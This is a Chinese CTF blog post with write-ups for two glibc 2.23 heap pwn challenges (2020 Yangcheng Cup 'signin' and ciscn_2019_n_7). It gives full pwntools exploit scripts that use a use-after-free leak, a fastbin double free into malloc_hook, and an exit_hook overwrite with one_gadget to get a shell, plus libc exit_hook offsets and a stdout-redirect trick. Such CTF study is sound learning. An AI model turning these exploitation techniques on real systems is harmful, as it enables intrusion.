水几个pwn

最新推荐文章于 2023-09-13 23:59:18 发布
最新推荐文章于 2023-09-13 23:59:18 发布
阅读量242 收藏
点赞数
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Stella_Leo/article/details/119897488
版权

author: moqizou

2020-羊城杯-signin

签到题目2.23的glibc

add - 最多10个chunk然后会malloc(0x28)之后就是namesize结构体如下

0x10 chunk 头
0x8 1 inuse位置
0x8 buf->name_chunk
0x8 23字节的message
0x8 看上面可以溢出

然后会把该chunk指针 存入全局table

view 通过判断inuse输出name和message

del uaf,只清除chunk_table和name_chunk

利用的话,这里用到了一点,free的chunk再次malloc回来的时候内容不会清空,这样也就给我们提供了泄露的uaf利用的可能性,但是我想的是
如果这样的话,那么uaf泄露什么特殊的地方呢?..应该主要还是强在fd劫持上面

总之利用分割unsorted bin就可以泄露。main_arena这里的偏移好像是有点奇怪,可以调试出来的,但是最好控制住不要去覆盖bk指针

pwndbg> x/20gx 0x5584286691a0
0x5584286691a0:	0x0000000000000000	0x0000000000000031
0x5584286691b0:	0x0a64646464646464	0x00007fba4ab1bb0a

泄露地址之后,就方便许多,利用fastbin的任意地址分配,和double free分配chunk到malloc_hook附近,然后打one_gadget,由于无法再次add(已经add满了)所以利用double free的检测(该检测会调用malloc函数)拿到shell
exp

#!usr/bin/env python
# -*- coding:utf-8 -*-
 
from pwn import*

context.log_level ='DEBUG'

r = process('./easypwn')

elf = ELF('./easypwn')

libc = ELF('/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')
# libc = ELF('./libc.so.6')

def add(length,name,color):
    r.recvuntil("Your choice :")
    r.sendline("1")
    r.recvuntil(":")
    r.sendline(str(length))
    r.recvuntil(":")
    r.sendline(name)
    r.recvuntil(":")
    r.sendline(color)

def visit():
    r.recvuntil("Your choice :")
    r.sendline("2")

def remove(idx):
    r.recvuntil("Your choice :")
    r.sendline("3")
    r.recvuntil(":")
    r.sendline(str(idx))

def clean():
    r.recvuntil("Your choice :")
    r.sendline("4")

#attach(r,'b main')
add(0x60,'a'*8,'a'*8)
add(0x60,'a'*8,'a'*8)
add(0x80,'b'*8,'b'*8)
add(0x60,'c'*8,'c'*8)

remove(2)


add(0x20,'d'*6+'\n','e'*8)

# gdb.attach(r)
visit()
r.recvuntil("d"*6+'\n')
main_arena = u64(r.recv(6).ljust(8, '\x00'))-0xa +0x20
print hex(main_arena)
libc_base = main_arena - 0x3C4B20
print hex(libc_base)
pause()

# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   rax == NULL

# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   [rsp+0x30] == NULL

# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
#   [rsp+0x50] == NULL

# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL
one_gadget = libc_base +0xf1247
target = main_arena - 0x33
remove(0)
remove(1)
remove(0)
add(0x60,p64(target),'a')

add(0x60,'b','b')
add(0x60,'c','c')
payload = 'a'*0x13 + p64(one_gadget)
add(0x60,payload,'d')

#不能再add堆块了
#两次free同一个chunk,触发报错函数
#而调用报错函数的时候又会用到malloc-hook,从而getshell
remove(0)
remove(0)

r.interactive()

ciscn_2019_n_7

太简单了不想分析了

唯一的用处是exit hook之前知道这个东西,但没想到是个固定偏移

#在libc-2.23中
exit_hook = libc_base+0x5f0040+3848

exit_hook = libc_base+0x5f0040+3856

#在libc-2.27中

exit_hook = libc_base+0x619060+3840

exit_hook = libc_base+0x619060+3848

任意一个打hook就可以,这题还有一个坑

  close(1);
  close(2);
  exit(0);

正常退出会关闭输出流和错误流。这样就无法正常输出结果。
所以不能正常退出,随便输入一个a退出就可以了。
exp

from pwn import *
context.log_level='debug'
p = process('./ciscn_2019_n_7')
#p = remote('node4.buuoj.cn','25859')
libc = ELF('/home/leo/Desktop/moyu/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')

p.recvuntil('Your choice-> \n')
p.sendline('666')
puts = int(p.recvuntil('\n'),16)
libc_base = puts - libc.sym['puts']
print "[+]puts_addr=>"+hex(puts)
print "[+]libc_base=>"+hex(libc_base)

exit_hook = libc_base + 0x5f0040 + 3848
one = 0xf1247
'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''

p.recvuntil('Your choice-> \n')
p.sendline('1')
p.sendlineafter(': \n',str(0x10))
p.recvuntil('name:')
p.send('a'*0x8 + p64(exit_hook))

p.recvuntil('Your choice-> \n')
p.sendline('2')
p.sendlineafter('name:\n','test')
p.sendlineafter(':\n',p64(libc_base+one))

p.sendlineafter("Your choice-> \n",'4')


p.interactive()

还可以把输出流绑定到0也就是输入流,
exec 1>&0然后就可以了

$ ls
$ exec 1>&0
$ ls
bin
boot
dev
etc
flag
home
lib
lib32
lib64
log.txt
media
mnt
opt
proc
pwn
root
run
sbin
srv
sys
tmp
usr
var

参考

exit_hook
输入输出重定向
https://stackoverflow.com/questions/30968734/reopen-stdout-and-stderr-after-closing-them

16385
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2020YCBCTF:2020羊城官方writeup及
03-24
20202020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
2022羊城pwn wp
N1rvana的博客
09-04 833
2022羊城pwn
BUUCTF:[羊城 2020]signin
末初的CSDN博客
04-23 1669
https://buuoj.cn/challenges#[%E7%BE%8A%E5%9F%8E%E6%9D%AF%202020]signin signin.txt BCEHACEIBDEIBDEHBDEHADEIACEGACFIBDFHACEGBCEHBCFIBDEGBDEGADFGBDEHBDEGBDFHBCEGACFIBCFGADEIADEIADFH Toy Cipher: https://eprint.iacr.org/2020/301.pdf 先将密文四个一组对照第二张表转换,简单Pytho
ycb2020babypwn(unsortedbin爆破stdout泄露)
qq_33590156的博客
12-04 321
题目没有leak函数,肯定得打stdout,但是又是个2.23,有指针没清零的漏洞 在stdout-0x43的地方有0x7f的size,而且和main_arena+88很近,最后三位固定是0x5dd,所以需要爆破第二个字节的高位,概率是1/16。这应该是没leak的通用打法 然后题目是通过double free,控制堆块,修改size进unsortedbin,然后爆破fd,申请出stdout泄露libc,最后打malloc_hook和realloc去getshell。 操作 首先肯定是double free
[羊城 2020]Bytecode [UTCTF2020]babymips
寻梦&之璐
05-30 1102
文章目录查看题目python代码Z3约束脚本 查看题目 python字节码,需要把它转为python代码,如下: python代码 import dis def main(): en=[3,37,72,9,6,132] output=[101,96,23,68,112,42,107,62,96,53,176,179,98,53,67,29,41,120,60,106,51,101,178,189,101,48] print("welcome to GWHT2020") f
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
welpwn pwn 入门题
02-11
pwn 入门题
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
warmup pwn入门题
02-11
pwn入门题
羊城_2020_babyre 题解
lifanxin的博客
09-09 1067
babyre题目信息考查知识题目分析WP脚本总结 题目信息   本题目来自于2020羊城的逆向题,可以在buuoj上找到题目复现。 考查知识   本题目考查的知识点有:DES/AES算法,SMC自修改代码,以及合理利用动态调试来快速解题。   关于动态调试,这里很多人可能会遇到环境问题,主要是因为题目调用了openssl的动态加密算法库,所以本地也得有一个。同时还需要注意openssl加密算法库的版本问题,该题目必须使用libcrypto.so.1.0.0。这里我给出该算法库文件 – libcrypto
2020 西湖论剑 pwn noleakfmt
yongbaoii的博客
03-29 452
canary没开,方便溢出。 主逻辑简单。 格式化字符串漏洞。 给了我们一个栈地址,但是主要问题是把标准输出关掉了。 我们要利用的呢就是将_IO_2_1_stdout_的_fileno从1改成2,为啥呢? 对于一个FILE结构体来说,最重要的就是_flags和_fileno,_fileno存储的是我们的文件描述符,对于某些情况或许我们要劫持_fileno才能达到我们的目的,而_flags则标志了该FILE的一些行为,这对于我们的泄露至关重要。 我们想办法劫持结构体的_fileno之后就可以从标准错误做一.
[BUUCTF]PWN——wustctf2020_closed
mcmuyanga的博客
01-12 2172
wustctf2020_closed 附件 步骤: 例行检查,64位程序,开启了nx保护 本地试运行一下看看大概的情况 64位ida载入,首先是检索程序里的字符串,找到了后门 main函数里的关键函数 close(1)关闭了标准输出 close(2)关闭了标准错误 我们只剩下标准输入,并且看到程序会返回shell(0是标准输入,1是标准输出,2是标准错误) 在看了别人的wp之后了解到,原来可以对stdout重定向,将文件描述符 1 重定向到文件描述符 0 : 因此这题不用写exp,直接执行 ex
ctf遇见题目close(1)怎么调试
azraelxuemo的博客
04-13 1372
以d3ctf_2019_unprintablev这个为例 这个关闭了1,虽然解法用爆破可以做,但是调试起来很麻烦,我是这样解决的 因为stdout是全局变量,所以会在bss里面定义stdout 因为close(1)的原理就是关闭了1号文件描述符,所以我们只需要把stdout的文件描述符改成2就好 def debug(): gdbscript = """ b vuln c set *(char *)(*(unsigned long int *)$rebase(0x20202
[BUUCTF-pwn]——wustctf2020_closed
Y_peak的博客
04-02 613
[BUUCTF-pwn]——wustctf2020_closed 相信看过题目反汇编的人都知道. 这个题目直接给了你shell 但是为什么输入cat flag无法得到flag. 其实就是因为close(1) 这个命令将你的标准输出给关掉了. 也就意味着, 无法输出任何东西给你 你们应该也看到了其他一些, wp 说只要exec 1>&0就可以了 但是你们却不知道这个的具体含义 exec 也就是重定位在Linux里面 exec 1>&0的意思就是将标准输出定位到标准输入的文件. &a
buuctf pwn(wustctf2020_closed)(hitcontraining_magicheap)(axb_2019_fmt32)
cainiao78777的博客
04-29 215
程序有alarm闹钟函数,并且有明显的格式化字符串漏洞,而且能无限利用格式化字符串漏洞,本来想用我之前的那种解法直接解决的,但是遇到了些问题(下面说),而且这个题目got表可写,所以还是老老实实打got表吧。2.编辑堆块,根据bss段里的指针,来找到相应的堆块,然后输入大小,再填充内容,并未检测原本输入堆块内容的大小,那么此处存在堆溢出。再通过读入,覆盖dest的指针为free的got表地址,然后strcpy将free的got表地址的地址覆盖为shllcode的地址。
ciscn_2019_n_7
qq_62887641的博客
09-13 65
泄露libc求出exit_hook,然后exit_hook改成onegadget,我们退出程序就可以getshell。这个name是可以输入0x10字节,然后可以溢出到[2],也就是更改掉chunk B 的指针。add这里是只能申请一个chunk,然后在29行结合下面的edit,有个溢出,这里申请了一个chunk,并且是通过BSSPTR指针指向。并且给了泄露puts的libc。
【exit hook】ciscn_2019_n_7
huzai9527的博客
04-19 609
【exit hook】ciscn_2019_n_7 1.ida分析 输入666获得puts地址,计算libc偏移 输入name的时候,可以输入16个字节,但是只有前8个字节可用,后面8个字节是content的指针 2.思路 通过puts计算libc的偏移 溢出到content指针,修改为exit_hook的地址 edit将exit_hook改为onegadget 3.exp from pwn import * p = remote('node3.buuoj.cn',28010)
几个pwn入门的网站
06-10
1. Pwnable.kr:这是一个经典的 pwn 入门网站,它提供了一系列的 pwn 题目,从简单到困难,适合初学者进行练习。 2. OverTheWire:这是一个综合性的安全入门网站,其中包含了一些 pwn 题目,适合初学者进行练习。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值